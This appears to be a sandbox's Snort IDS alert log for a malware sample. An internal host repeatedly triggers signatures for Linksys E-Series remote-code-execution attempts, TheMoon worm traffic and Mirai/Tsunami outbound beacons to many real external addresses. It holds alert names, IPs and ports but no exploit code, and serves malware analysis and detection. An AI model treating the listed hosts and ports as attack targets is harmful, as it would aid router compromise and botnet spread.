    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:43132 -> 172.65.166.137:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:46078 -> 112.166.21.35:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58688 -> 88.99.207.170:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 62.182.34.77:8080 -> 192.168.2.23:49128
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.164.198.134:8080 -> 192.168.2.23:47776
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49550 -> 88.253.246.84:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.131.208:80 -> 192.168.2.23:44024
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:53162 -> 172.65.49.111:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:53162 -> 172.65.49.111:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:53162 -> 172.65.49.111:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33710 -> 88.157.120.231:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.164.199.174:8080 -> 192.168.2.23:38604
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.162.47:8080 -> 192.168.2.23:35834
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.164.195.62:8080 -> 192.168.2.23:58060
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50960 -> 112.120.16.144:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35478 -> 112.187.114.126:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.170.215:8080 -> 192.168.2.23:33210
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.161.157:8080 -> 192.168.2.23:36152
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.164.196.18:8080 -> 192.168.2.23:43312
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.207.166:80 -> 192.168.2.23:43048
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51406 -> 88.248.161.156:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52820 -> 112.172.138.202:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:51422 -> 172.65.72.102:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:51422 -> 172.65.72.102:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:51422 -> 172.65.72.102:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:42854 -> 172.65.126.55:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:42854 -> 172.65.126.55:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:42854 -> 172.65.126.55:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:56702 -> 172.65.157.174:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:56702 -> 172.65.157.174:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:56702 -> 172.65.157.174:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35178 -> 88.119.21.220:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49256 -> 112.160.95.245:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:60254 -> 172.65.56.6:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:60254 -> 172.65.56.6:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:60254 -> 172.65.56.6:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:44450 -> 172.65.11.150:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:44450 -> 172.65.11.150:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:44450 -> 172.65.11.150:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:34220 -> 172.65.114.213:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:34220 -> 172.65.114.213:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:34220 -> 172.65.114.213:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:43006 -> 172.65.111.9:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:43006 -> 172.65.111.9:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:43006 -> 172.65.111.9:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58182 -> 88.136.144.252:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59446 -> 88.215.17.236:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:33992 -> 172.65.245.216:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:33992 -> 172.65.245.216:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:33992 -> 172.65.245.216:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:33520 -> 172.65.24.181:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:33520 -> 172.65.24.181:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:33520 -> 172.65.24.181:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:54926 -> 172.65.163.187:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:54926 -> 172.65.163.187:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:54926 -> 172.65.163.187:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:54302 -> 172.245.195.171:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:54302 -> 172.245.195.171:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:54302 -> 172.245.195.171:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:56472 -> 172.65.200.10:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:56472 -> 172.65.200.10:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:56472 -> 172.65.200.10:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:44848 -> 172.65.253.27:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:44848 -> 172.65.253.27:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:44848 -> 172.65.253.27:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:33478 -> 172.65.89.25:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:33478 -> 172.65.89.25:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:33478 -> 172.65.89.25:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:49172 -> 172.65.101.0:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:49172 -> 172.65.101.0:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:49172 -> 172.65.101.0:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:41000 -> 172.247.3.158:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:41000 -> 172.247.3.158:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:41000 -> 172.247.3.158:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59980 -> 112.135.204.131:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42004 -> 88.28.223.229:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.106.56:8080 -> 192.168.2.23:41466
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.164.223.229:8080 -> 192.168.2.23:55832
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.186.179:80 -> 192.168.2.23:50108
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51192 -> 88.139.225.30:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:54748 -> 172.65.55.181:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:54748 -> 172.65.55.181:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:54748 -> 172.65.55.181:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:56830 -> 172.65.168.229:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:56830 -> 172.65.168.229:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:56830 -> 172.65.168.229:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:50816 -> 172.65.202.205:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:50816 -> 172.65.202.205:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:50816 -> 172.65.202.205:55555
    Source: TrafficSnort IDS: 404 ICMP Destination Unreachable Protocol Unreachable 31.208.247.168: -> 192.168.2.23:
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.36.131:80 -> 192.168.2.23:42076
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.222.173:80 -> 192.168.2.23:41282
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.91.84:8080 -> 192.168.2.23:52680
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:37706 -> 172.245.222.125:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:37706 -> 172.245.222.125:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:37706 -> 172.245.222.125:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34292 -> 95.69.43.170:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57342 -> 88.147.250.8:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:36794 -> 88.198.99.42:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.242.136:80 -> 192.168.2.23:58356
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58356 -> 95.100.242.136:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.21.106:80 -> 192.168.2.23:42288
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42754 -> 88.156.75.58:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.47.91:80 -> 192.168.2.23:38514
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53412 -> 95.154.197.181:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:34324 -> 95.81.98.158:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:52452 -> 172.65.81.2:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:52452 -> 172.65.81.2:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:52452 -> 172.65.81.2:55555
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.87.188:80 -> 192.168.2.23:59360
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:59360 -> 88.221.87.188:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.173.116:80 -> 192.168.2.23:45626
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:45626 -> 95.101.173.116:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44672 -> 95.159.32.62:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.164.221.35:8080 -> 192.168.2.23:53550
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:54608 -> 88.218.117.56:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.254.95:80 -> 192.168.2.23:50876
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50876 -> 88.221.254.95:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.222.141:80 -> 192.168.2.23:56500
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.169.50:80 -> 192.168.2.23:39216
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39216 -> 95.100.169.50:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:51976 -> 95.248.114.214:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:46776 -> 172.65.176.102:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:46776 -> 172.65.176.102:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:46776 -> 172.65.176.102:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47956 -> 88.119.98.49:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.71.17:80 -> 192.168.2.23:44718
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.25.104:80 -> 192.168.2.23:45066
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38444 -> 95.141.40.219:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:34728 -> 172.65.217.161:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:34728 -> 172.65.217.161:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:34728 -> 172.65.217.161:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44626 -> 88.221.9.171:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48284 -> 88.42.123.82:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:56604 -> 112.186.180.174:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58872 -> 112.169.69.164:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43240 -> 95.26.196.188:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44696 -> 88.221.9.171:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:43446 -> 172.65.68.177:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:43446 -> 172.65.68.177:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:43446 -> 172.65.68.177:55555
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.36.39:8080 -> 192.168.2.23:49426
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42742 -> 112.140.176.40:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:35072 -> 112.199.113.142:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:57450 -> 172.65.162.145:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:57450 -> 172.65.162.145:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:57450 -> 172.65.162.145:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:44830 -> 172.65.216.19:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:44830 -> 172.65.216.19:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:44830 -> 172.65.216.19:55555
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.179.41:8080 -> 192.168.2.23:48902
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.16.92:8080 -> 192.168.2.23:49340
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:52576 -> 172.121.6.15:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:52576 -> 172.121.6.15:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:52576 -> 172.121.6.15:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53878 -> 88.99.97.194:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60006 -> 88.99.185.10:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42822 -> 88.99.193.177:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:42882 -> 88.205.28.158:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:58174 -> 88.212.197.230:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.6.96:80 -> 192.168.2.23:55370
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:55370 -> 88.221.6.96:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39658 -> 88.164.124.218:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:53528 -> 88.87.68.204:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.191.24:8080 -> 192.168.2.23:40492
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 88.221.6.96:80 -> 192.168.2.23:55426
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:41956 -> 88.198.15.15:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:50376 -> 88.86.124.220:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:40778 -> 88.147.129.187:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.100.143.229:80 -> 192.168.2.23:46216
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:44024 -> 88.221.131.208:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.223.243:80 -> 192.168.2.23:36178
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.211.92:80 -> 192.168.2.23:51224
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:38458 -> 95.130.59.100:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:39328 -> 172.65.163.243:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:39328 -> 172.65.163.243:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:39328 -> 172.65.163.243:55555
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.164.209.61:8080 -> 192.168.2.23:44938
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:50420 -> 172.65.182.233:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:50420 -> 172.65.182.233:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:50420 -> 172.65.182.233:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:42794 -> 172.65.178.33:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:42794 -> 172.65.178.33:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:42794 -> 172.65.178.33:55555
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:48806 -> 172.65.51.236:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:48806 -> 172.65.51.236:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:48806 -> 172.65.51.236:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48522 -> 112.147.103.75:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:36954 -> 172.65.95.191:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:36954 -> 172.65.95.191:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:36954 -> 172.65.95.191:55555
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:43048 -> 88.221.207.166:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:52634 -> 112.210.155.183:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.172.195:8080 -> 192.168.2.23:42206
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:48756 -> 88.198.40.80:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:57142 -> 112.187.44.208:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 94.131.87.243:8080 -> 192.168.2.23:48332
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.164.204.220:8080 -> 192.168.2.23:55086
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:49620 -> 95.97.26.243:80
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.101.178.142:80 -> 192.168.2.23:36492
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39522 -> 95.158.187.227:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:33048 -> 112.186.220.118:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:60868 -> 95.239.152.64:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:35478 -> 172.65.240.13:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:35478 -> 172.65.240.13:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:35478 -> 172.65.240.13:55555
    Source: TrafficSnort IDS: 1200 ATTACK-RESPONSES Invalid URL 95.164.197.162:8080 -> 192.168.2.23:33378
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:39084 -> 88.196.99.114:80
    Source: TrafficSnort IDS: 2027121 ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami) 192.168.2.23:47940 -> 88.152.12.58:80
    Source: TrafficSnort IDS: 2018132 ET WORM TheMoon.linksys.router 2 192.168.2.23:54428 -> 172.65.192.56:55555
    Source: TrafficSnort IDS: 2027153 ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 192.168.2.23:54428 -> 172.65.192.56:55555
    Source: TrafficSnort IDS: 2026102 ET EXPLOIT Linksys E-Series Device RCE Attempt 192.168.2.23:54428 -> 172.65.192.56:55555
